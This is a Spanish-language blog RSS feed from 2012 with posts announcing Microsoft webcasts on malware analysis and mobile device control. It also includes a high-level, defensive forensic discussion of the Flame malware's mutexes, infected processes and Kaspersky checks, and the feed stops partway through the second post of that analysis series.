<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>El diario de Juanito</title>
	<atom:link href="http://windowstips.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://windowstips.wordpress.com</link>
	<description>Otro blog más...</description>
	<lastBuildDate>Fri, 07 Jun 2013 01:50:39 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='windowstips.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>El diario de Juanito</title>
		<link>http://windowstips.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://windowstips.wordpress.com/osd.xml" title="El diario de Juanito" />
	<atom:link rel='hub' href='http://windowstips.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Webcast: Análisis de Malware con Sysinternals</title>
		<link>http://windowstips.wordpress.com/2012/07/19/webcast-analisis-de-malware-con-sysinternals/</link>
		<comments>http://windowstips.wordpress.com/2012/07/19/webcast-analisis-de-malware-con-sysinternals/#comments</comments>
		<pubDate>Thu, 19 Jul 2012 09:11:17 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[conferencias]]></category>
		<category><![CDATA[Diario]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Webcast]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=990</guid>
		<description><![CDATA[Hola a tod@s! La semana que viene, más concretamente el martes 24 de Julio a las 16:00, tendré el gusto de dar otro Webcast sobre análisis de Malware orientado principalmente a Administradores de Sistemas. Como en el otro Webcast, se verán las capacidades de las herramientas de SysInternals así como sus novedades añadidas y funcionalidades [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=990&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>La semana que viene, más concretamente el martes 24 de Julio a las 16:00, tendré el gusto de dar otro Webcast sobre análisis de Malware orientado principalmente a Administradores de Sistemas.</p>
<p>Como en el otro Webcast, se verán las capacidades de las herramientas de SysInternals así como sus novedades añadidas y funcionalidades que ayudarán a un administrador TI en la búsqueda y análisis de Malware. El guión completo más la URL de conexión lo tenéis en el siguiente párrafo.</p>
<blockquote><p>En este Webcast se mostrará una primera aproximación sobre cómo los administradores de sistemas e investigadores de seguridad se pueden enfrentar a amenazas de tipo APT utilizando para ello las herramientas de Microsoft SysInternals.<br />
Para esta sesión, se utilizará como demostración la reciente aparición de un Malware que ha dado mucho que hablar dentro de la comunidad de seguridad, así como en equipos de gobierno y fuerzas de seguridad del Estado: el Malware FLAME.<br />
Con la información obtenida en esta sesión se podrá comprobar cómo los analistas de sistemas, así como administradores de seguridad, pueden utilizar estos datos para mitigar la amenaza utilizando para ello una arquitectura basada en Microsoft.</p>
<p>URL de conexión: <a title="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032521432&amp;Culture=es-ES&amp;community=0" href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032521432&amp;Culture=es-ES&amp;community=0" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032521432&amp;Culture=es-ES&amp;community=0 </a></p></blockquote>
<p>Os espero por allí!</p>
<p>Salu2 a tod@s!!</p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/990/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=990&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/07/19/webcast-analisis-de-malware-con-sysinternals/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>
	</item>
		<item>
		<title>Webcast: Control de dispositivos móviles</title>
		<link>http://windowstips.wordpress.com/2012/07/04/webcast-control-de-dispositivos-moviles/</link>
		<comments>http://windowstips.wordpress.com/2012/07/04/webcast-control-de-dispositivos-moviles/#comments</comments>
		<pubDate>Wed, 04 Jul 2012 07:10:48 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Blogroll]]></category>
		<category><![CDATA[Blogs]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[Webcast]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[corporativo]]></category>
		<category><![CDATA[exchangespain]]></category>
		<category><![CDATA[movilidad]]></category>
		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=987</guid>
		<description><![CDATA[Buenos días a tod@s!! Mi amigo Joshua Sáenz, experto consultor en entornos corporativos, movilidad y monitorización, me ha comentado a razón de los Webcast que imparto esta tarde y mañana sobre Malware en entornos corporativos,  que va a dar el Viernes un Webcast sobre control de dispositivos móviles en entornos corporativos. Sin duda un tema [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=987&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Buenos días a tod@s!!</p>
<p>Mi amigo <strong>Joshua Sáenz, </strong>experto consultor en entornos corporativos, movilidad y monitorización, me ha comentado a razón de los Webcast que imparto <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518505&amp;Culture=es-ES&amp;community=0" target="_blank">esta tarde</a> y <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518510&amp;Culture=es-ES&amp;community=0" target="_blank">mañana</a> sobre <a href="http://windowstips.wordpress.com/tag/flame/" target="_blank">Malware en entornos corporativos</a>,  que va a dar el Viernes un Webcast sobre <strong><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032515457&amp;Culture=es-ES" target="_blank">control de dispositivos móviles en entornos corporativos</a>. </strong>Sin duda un tema muy interesante, y más ahora que hay tanta &#8220;libertad&#8221; por parte de los trabajadores de una empresa, de utilizar sus propios dispositivos como elementos de trabajo.</p>
<p><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032515457&amp;Culture=es-ES" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032515457&amp;Culture=es-ES</a></p>
<p>Esta opción de trabajo, que en muchas ocasiones puede ser beneficiosa para una empresa,  a largo plazo y en función de los trabajadores de la misma, puede ser un incordio. Y en muchas ocasiones, una pesadilla.</p>
<p>Para ello, Joshua obrará su magia, y explicará los entresijos así como problemas que se le pueden plantear a un administrador de sistemas cuando tenga que gestionar este tipo de dispositivos en una organización.  En el Webcast, Joshua utilizará como plataforma base System Center 2012 y Exchange Server 2010, centrándose en el control de los dispositivos, así como el control de la seguridad de los mismos.</p>
<p>Si queréis poner antecedentes al Webcast del Viernes, Joshua tiene publicados tres artículos bastante buenos sobre control de dispositivos en su estupendo blog <a href="http://www.exchangespain.com/" target="_blank">ExchangeSpain</a>, los cuales os linko aquí para su lectura!</p>
<p><a href="http://www.exchangespain.com/post/Control-de-dispositivos-moviles-(I-de-III).aspx" target="_blank">Control de dispositivos móviles (I de III)</a></p>
<p><a href="http://www.exchangespain.com/post/Control-de-dispositivos-moviles-(II-de-III).aspx" target="_blank">Control de dispositivos móviles (II de III)</a></p>
<p><a href="http://www.exchangespain.com/post/Control-de-dispositivos-moviles-(III-de-III).aspx" target="_blank">Control de dispositivos móviles (III de III)</a></p>
<p>Otra cita que no os podéis perder!</p>
<p>Os veo esta tarde chavalería! Saludos a tod@s!!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/987/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/987/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=987&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/07/04/webcast-control-de-dispositivos-moviles/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>
	</item>
		<item>
		<title>Webcast sobre Flame o {ponga-amenaza-aquí} para administradores IT</title>
		<link>http://windowstips.wordpress.com/2012/06/27/webcast-sobre-flame-o-ponga-amenaza-aqui-para-administradores-it/</link>
		<comments>http://windowstips.wordpress.com/2012/06/27/webcast-sobre-flame-o-ponga-amenaza-aqui-para-administradores-it/#comments</comments>
		<pubDate>Wed, 27 Jun 2012 05:52:39 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Diario]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Webcast]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Flame]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[sysinternals]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=982</guid>
		<description><![CDATA[Hola a tod@s! Después de todo lo que se ha hablado del infame FLAME, poco de momento se puede hablar más, hasta que no salgan nuevos hallazgos sobre el tema. Lo que si es un hecho es que parece que este Malware ha sido el nexo de unión entre piques de soluciones Antimalware. Por un [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=982&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>Después de todo lo que se ha hablado del infame FLAME, poco de momento se puede hablar más, hasta que no salgan nuevos hallazgos sobre el tema. Lo que si es un hecho es que parece que este Malware ha sido el nexo de unión entre piques de soluciones Antimalware. Por un lado tenemos el <a href="http://www.f-secure.com/weblog/archives/00002383.html">post que publicó Mikko de F-Secure</a>, en el que explícitamente nombra la amenaza de FLAME como una especie de LAMERADA con la originalidad de un “matón de colegio”.</p>
<p>Kaspersky, por su parte, no ha entrado en la pelea, y sigue deleitándonos con muy <a href="http://www.securelist.com/en/blog?weblogid=208193540" target="_blank">buenos artículos</a> centrados en sus investigaciones sobre la supuesta amenaza (Que es lo importante), la cual, poco a poco, se nos va desvelando.</p>
<p>Por la parte de Bit9, han decidido realizar un <a href="https://www.bit9.com/landing/2012/06/flame-webcast/index.php">Webcast</a> (Ya terminado), en el que hacen conciencia sobre lo vulnerables que podemos ser ante este tipo de amenazas.  Son ellos también, los que han realizado un <a href="https://www.bit9.com/files/Threat_Advisor_Flame_FINAL.pdf">reporte “light”</a> sobre FLAME, explicando en líneas generales (y comerciales) en qué consiste esta amenaza de tipo APT.</p>
<p>Yo por mi parte no voy a entrar a valorar si la metodología de ataque es buena o mala, si el código utilizado incorpora librerías no nativas del sistema, lo que convierte al Malware en un “gordito”, o si se basa en código de “otros”. Eso se lo dejo a los verdaderos profesionales del tema. Por otro lado, y puestos a ser un poco mamoncete podríamos decir que…</p>
<p>Mucho lamer, malware gordito y lento, pero nadie ha sido capaz de detectarlo en 4 años jaja</p>
<p><a href="http://windowstips.files.wordpress.com/2012/06/lamer.png" target="_blank"><img class="size-medium wp-image-983 aligncenter" title="lamer" src="http://windowstips.files.wordpress.com/2012/06/lamer.png?w=300&#038;h=287" alt="" width="300" height="287" /></a></p>
<p>Desde Microsoft han reservado dos Webcast para hablar sobre amenazas de tipo persistentes (APT) que se puedan presentar y coexistir en una arquitectura Microsoft. Y me han pedido que si podía dar estas dos sesiones y aportar mi humilde opinión.</p>
<p>Como no quería entrar en debates sobre este tipo de amenazas, si son peligrosas o no, me he decantado por intentar aportar una visión más “administrativa” e intentar dar respuesta a ese colectivo tan olvidado de la mano de Dios… Los sufridos Administradores de Sistemas.</p>
<p>Así que estos dos Webcast , vayan dedicados a estos profesionales como la copa de un pino, que en multitud de ocasiones tienen que aguantar a todo un colectivo de personas con multitud de problemas…. Aclamando que el suyo es “el más importante”…</p>
<p>El primer Webcast irá dirigido al análisis de un Malware a través de las herramientas de SysInternals, así como otras herramientas menos conocidas, pero igual de interesantes y útiles. Todo el desarrollo de este Webcast, se complementará con demostraciones prácticas con este Malware, así que podréis ver, cómodamente desde vuestro curro, casa, bar, playa, etc..,  cómo utilizar herramientas nativas de Spectra para realizar esta primera valoración en un análisis dinámico de Malware.</p>
<p>El segundo Webcast va dirigido a descubrir, haciendo uso de la arquitectura existente, y con la información anterior, si la amenaza se ha extendido a otros equipos de la organización. Para ello hablaremos de Active Directory, PowerShell y por qué no…. <a href="http://www.slideshare.net/rootedcon/juan-garrido-corporate-forensics-saca-partido-a-tu-arquitecturarootedcon-2012" target="_blank">De BATCH!! </a>(Lorenzo no te lo pierdas!! <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</p>
<p>Tanto en el primer Webcast como en el segundo, comentaré y referenciaré la ingente cantidad de buenos post redactados por compañeros de profesión como son <a href="twitter.ie/ssantosv" target="_blank">Sergio de los Santos</a>, <a href="twitter.com/YJesus" target="_blank">Yago</a>, <a href="https://twitter.com/#%21/ldelgadoj" target="_blank">Luis Delgado</a>, <a href="http://twitter.com/#!/Seifreed" target="_blank">Marc Rivero (Seifreed)</a>, <a href="twitter.com/chemaalonso" target="_blank">el Maligno</a>, etc…</p>
<p>Así que aprovecho también desde aquí para felicitarlos a todos ellos por tan buena información, así como el trabajo de redactarlo y publicarlo para todos. Sin estos artículos y sin la ayuda de alguno (Gracias Seifreed!) el trabajo de comprensión y adaptación me hubiese tomado el doble o triple de tiempo.</p>
<p><strong>Webcast. Análisis de Flame con SysInternals (04 de Julio 16:00 horas)</strong></p>
<p>En este Webcast daremos una primera visión de cómo administradores de sistemas e investigadores de seguridad, se pueden enfrentar a amenazas de tipo persistente (Advanced Persistent Threat), utilizando para ello las herramientas de Microsoft SysInternals.</p>
<p>Para la primera sesión, se utilizará como demostración la reciente aparición de un Malware que ha dado mucho que hablar dentro de la comunidad de seguridad, así como en equipos de gobierno y fuerzas de seguridad: el Malware FLAME.</p>
<p>Con la información obtenida en esta primera sesión, se podrá comprobar como los analistas de sistemas, así como administradores de seguridad, pueden utilizar estos datos para mitigar la amenaza utilizando para ello una arquitectura basada en Microsoft.</p>
<p><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518505&amp;Culture=es-ES&amp;community=0" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518505&amp;Culture=es-ES&amp;community=0</a></p>
<p><strong>Webcast. ¿Amenazas a mí? Sácale partido a tu arquitectura (05 de Julio 16:00 horas)</strong></p>
<p>A través de la información recogida y analizada en el Webcast anterior (Análisis de Flame con Sysinternals), se procederá a mitigar una posible amenaza, utilizando para ello la propia infraestructura Microsoft que posea un cliente específico. A lo largo de la sesión, se dará una visión global y ejemplos específicos como por ejemplo Active Directory o PowerShell.</p>
<p><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518510&amp;Culture=es-ES&amp;community=0" target="_blank">https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518510&amp;Culture=es-ES&amp;community=0</a></p>
<p>Para teminar este post, y haciendo alusión a la palabra LAMER, utilizada para referenciar una amenaza, termino con unas palabras que me dijo un Administrador de Sistemas: &#8220;Una amenaza, por pobre que sea, es dañina por la propia definición de la palabra amenaza. No hay que olvidar que nosotros nos debemos a nuestros usuarios&#8221;.</p>
<p>Os espero la semana que viene!</p>
<p>Salu2 a tod@s!!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/982/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/982/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=982&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/06/27/webcast-sobre-flame-o-ponga-amenaza-aqui-para-administradores-it/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="http://windowstips.files.wordpress.com/2012/06/lamer.png?w=300" medium="image">
			<media:title type="html">lamer</media:title>
		</media:content>
	</item>
		<item>
		<title>Análisis de Flame parte III. La conspiración</title>
		<link>http://windowstips.wordpress.com/2012/06/14/analisis-de-flame-parte-iii-la-conspiracion/</link>
		<comments>http://windowstips.wordpress.com/2012/06/14/analisis-de-flame-parte-iii-la-conspiracion/#comments</comments>
		<pubDate>Thu, 14 Jun 2012 13:30:17 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[conspiranoias]]></category>
		<category><![CDATA[Curiosidades]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[conspiración]]></category>
		<category><![CDATA[conspiraciones]]></category>
		<category><![CDATA[Flame]]></category>
		<category><![CDATA[Gilipolleces]]></category>
		<category><![CDATA[paparruchas]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=970</guid>
		<description><![CDATA[Hola a tod@s! Disclaimer!! Esta entrada sólo refleja mis pensamientos impuros, sin ninguna connotación técnica, y que sólo alimentan mi desquiciada mente. Dicho queda&#8230; En el primer artículo, se vió cómo NO había que reproducir la muestra, si no era en un entorno totalmente &#8220;liviano&#8221; y sin ningún tipo de protección. Después, pasamos al segundo [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=970&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p><strong>Disclaimer!!</strong></p>
<p>Esta entrada sólo refleja mis pensamientos impuros, sin ninguna connotación técnica, y que sólo alimentan mi desquiciada mente. Dicho queda&#8230;</p>
<p>En el <a href="https://windowstips.wordpress.com/2012/06/12/analisis-de-flame-parte-i-el-fail/" target="_blank">primer artículo</a>, se vió cómo NO había que reproducir la muestra, si no era en un entorno totalmente &#8220;liviano&#8221; y sin ningún tipo de protección. Después, pasamos al <a href="https://windowstips.wordpress.com/2012/06/13/analisis-de-flame-parte-ii-la-primera-ejecucion/" target="_blank">segundo artículo</a>, en el que se refleja la primera ejecución del bicho. Qué hace, cómo lo hace, y qué toca.</p>
<p>Hoy me gustaría pasar a un tema más personal, más íntimo, por lo que<strong> quedáis avisados de lo que no ha podido filtrar mi mente</strong>, y que hoy expongo aquí.</p>
<p>Revisando el código de uno de los módulos que generaba Flame, se encuentran partes que hacen referencia a <a href="http://windowstips.wordpress.com/2011/12/02/a-la-caza-del-mutante-parte-i/" target="_blank">Mutex</a> creados por el mismo.</p>
<p style="text-align:center;"><a href="https://windowstips.files.wordpress.com/2012/06/mutex1.png" target="_blank"><img class="alignnone size-medium wp-image-971" title="mutex1" src="https://windowstips.files.wordpress.com/2012/06/mutex1.png?w=300&#038;h=112" alt="" width="300" height="112" /></a></p>
<p style="text-align:center;">Imagen 1.- Referencia a Mutex en código Flame</p>
<p>Esto ni de lejos es nuevo, pero me ayudó bastante a la hora de poder hacerme una idea de cuántos procesos se encontraban infectados a la hora de una primera ejecución de Flame.</p>
<p>A estos Mutex, se le añade presumiblemente el PID del proceso que se encuentra infectado, tal y como puede verse a través de la herramienta, también de Sysinternals, WinObj.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/mutex.png" target="_blank"><img class="size-medium wp-image-972 aligncenter" title="Mutex" src="https://windowstips.files.wordpress.com/2012/06/mutex.png?w=300&#038;h=85" alt="" width="300" height="85" /></a></p>
<p style="text-align:center;">Imagen 2.- Procesos implicados en la ejecución de Flame</p>
<p>En el caso de la imagen anterior, los procesos asociados son Explorer.exe, Services.exe y Winlogon.exe&#8230;. Casi nada&#8230;</p>
<p>Analizando dicha muestra, también me he encontrado con partes de código, que si bien no son idénticas a las encontradas en Stuxnet, poco le faltan&#8230; Este código, se aprovecha de vulnerabilidades antiguas y pequeños &#8220;trucos&#8221; que tiene el sistema operativo. Uno de ellos es la auto-ejecución en unidades extraíbles, y el otro es la posibilidad de jugar maliciosamente con enláces simbólicos en sistemas de ficheros NTFS.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/stuxnet.png" target="_blank"><img class="size-medium wp-image-973 aligncenter" title="Stuxnet" src="https://windowstips.files.wordpress.com/2012/06/stuxnet.png?w=300&#038;h=162" alt="" width="300" height="162" /></a></p>
<p style="text-align:center;">Imagen 3.- Código de explotación muy parecido (por no decir igualito) al utilizado por Stuxnet</p>
<p>La versión bajo la que estoy haciendo las pruebas, creo que es la misma (MD5:bdc9e04388bda8527b398a8c34667e18) en la que se basan la mayoría de informes y noticias de Internet.</p>
<p>La versión que yo estoy utilizando, NO SE EJECUTA bajo ningún concepto si existen ciertas aplicaciones monitorizando el sistema. Ni al siguiente reinicio ni nada. Es más, ni lo intenta.</p>
<p>A la hora de realizar con éxito la primera ejecución, éste pregunta insistentemente por versiones específicas de productos de Kaspersky, tal y como se puede ver en la imagen extraída de Process Monitor.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/kaspersky.png" target="_blank"><img class="size-medium wp-image-974 aligncenter" title="kaspersky" src="https://windowstips.files.wordpress.com/2012/06/kaspersky.png?w=300&#038;h=23" alt="" width="300" height="23" /></a></p>
<p style="text-align:center;">Imagen  4.- Peticiones a productos específicos de Kaspersky</p>
<p>Lo curioso de esto, es que prácticamente en todas las muestras que va generando Flame, se encuentran peticiones de este tipo de producto, pero no de otras soluciones de seguridad.</p>
<p><a href="https://windowstips.files.wordpress.com/2012/06/kaspersky1.png" target="_blank"><img class="size-medium wp-image-975 aligncenter" title="kaspersky1" src="https://windowstips.files.wordpress.com/2012/06/kaspersky1.png?w=300&#038;h=87" alt="" width="300" height="87" /></a></p>
<p style="text-align:center;">Imagen 5.- Llamadas a directorios que generan productos de Kaspersky en porciones de código Flame</p>
<p>Si a todo lo anterior le sumamos a que parece ser que en el código de Flame ha aparecido un comentario un tanto &#8220;jocoso&#8221;, da que pensar. La noticia me ha llegado vía <a href="http://seclists.org/fulldisclosure/2012/Jun/254" target="_blank">Full Disclosure</a>. Yo, que no soy ruso, ni tengo ni pajolera idea del idioma local de allí&#8230; Interpreto un &#8220;Mentiroso, gracias Kaspersky&#8221;&#8230;. Que por favor me lea un Ruso y acabe con mi agonía&#8230;.</p>
<p>Siendo no conspiranoico, puedo pensar que debido a que Kaspersky fue uno de los primeros en investigar Stuxnet, Duqu y ahora Flame, es posible que los creadores del bicho pusieran especial énfasis en productos de Kaspersky.</p>
<p>Otro punto a favor que le otorga la catalogación de Malware diseñado para la ciberguerra, es que todavía no se sabe muy bien si Stuxnet fue obra de la administración Bush, o por el contrario fue el Mossad&#8230; Mientras que algunos opinan que Stuxnet es obra de Bush/Obama, otros piensan de <a href="http://israelmatzav.blogspot.com.es/2012/06/mossad-stuxnet-is-our-baby-obama.html" target="_blank">manera diferente</a>.</p>
<p>Mucha gente opina que estamos asistiendo a un nuevo concepto de ciberguerra, tal y como apunta José Rosell, desde<a href="http://www.securityartwork.es/2012/06/13/ciberguerra-lo-siento-pero-se-me-ponen-los-pelos-de-punta-cuando-leo-algo-de-flame/?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+SecurityArtWork+%28Security+Art+Work%29" target="_blank"> Security At Work</a>, y que no se nos cuenta toda la información. Esto último, algo bastante lógico y normal, dentro de los cánones de la contención de masas y demás.</p>
<p>Que el <a href="http://www.elmundo.es/elmundo/2011/06/03/internacional/1307092390.html" target="_blank">Mossad e Irán </a>siempre estén hostiándose&#8230; Es algo que, desgraciadamente, lo tomamos como normal hoy día&#8230;</p>
<p>Pero bueno&#8230; Qué carajo sabré yo, que todavía me emociono cuando veo The Goonies&#8230;.</p>
<p>Un saludo a tod@s&#8230; Y siento la entrada de hoy!!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/windowstips.wordpress.com/970/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/windowstips.wordpress.com/970/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=970&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://windowstips.wordpress.com/2012/06/14/analisis-de-flame-parte-iii-la-conspiracion/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/f7d0cff771650ed79156de3a02b819eb?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Juanito</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/mutex1.png?w=300" medium="image">
			<media:title type="html">mutex1</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/mutex.png?w=300" medium="image">
			<media:title type="html">Mutex</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/stuxnet.png?w=300" medium="image">
			<media:title type="html">Stuxnet</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/kaspersky.png?w=300" medium="image">
			<media:title type="html">kaspersky</media:title>
		</media:content>

		<media:content url="https://windowstips.files.wordpress.com/2012/06/kaspersky1.png?w=300" medium="image">
			<media:title type="html">kaspersky1</media:title>
		</media:content>
	</item>
		<item>
		<title>Análisis de Flame parte II. La primera ejecución</title>
		<link>http://windowstips.wordpress.com/2012/06/13/analisis-de-flame-parte-ii-la-primera-ejecucion/</link>
		<comments>http://windowstips.wordpress.com/2012/06/13/analisis-de-flame-parte-ii-la-primera-ejecucion/#comments</comments>
		<pubDate>Wed, 13 Jun 2012 14:40:21 +0000</pubDate>
		<dc:creator>Juanito</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[forensics]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Flame]]></category>
		<category><![CDATA[flamer]]></category>
		<category><![CDATA[win32.flame]]></category>
		<category><![CDATA[zlib]]></category>

		<guid isPermaLink="false">http://windowstips.wordpress.com/?p=952</guid>
		<description><![CDATA[Hola a tod@s! En el anterior artículo hablábamos de cómo NO habíamos podido ejecutar la muestra de Flame debido a algún problema técnico. La pregunta que terminé haciéndome era que por qué otros sí habían conseguido ejecutarla y yo no. Tocaba tirar de recursos! En toda la documentación que he leído, se comenta acerca de [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=windowstips.wordpress.com&#038;blog=575339&#038;post=952&#038;subd=windowstips&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Hola a tod@s!</p>
<p>En el <a href="http://windowstips.wordpress.com/2012/06/12/analisis-de-flame-parte-i-el-fail/" target="_blank">anterior artículo</a> hablábamos de cómo NO habíamos podido ejecutar la muestra de Flame debido a algún problema técnico. La pregunta que terminé haciéndome era que por qué otros sí habían conseguido ejecutarla y yo no. Tocaba tirar de recursos!</p>
<p>En toda la documentación que he leído, se comenta acerca de los diferentes cifrados que utiliza Flame. Debido a que mis nociones de ingeniería inversa y reversing de Malware son bastante pobres, opté por analizar la información que se encontraba en el momento de la ejecución de Flame. Así que recurrí a la vía forense, y realicé un volcado de memoria segundos después de la carga de Flame a través de rundll32.</p>
<p>Como no quería errar en el intento, provoqué un BSOD en la máquina, a través de la herramienta de <a href="http://download.sysinternals.com/files/NotMyFault.zip" target="_blank">SysInternals NotMyFault</a>.</p>
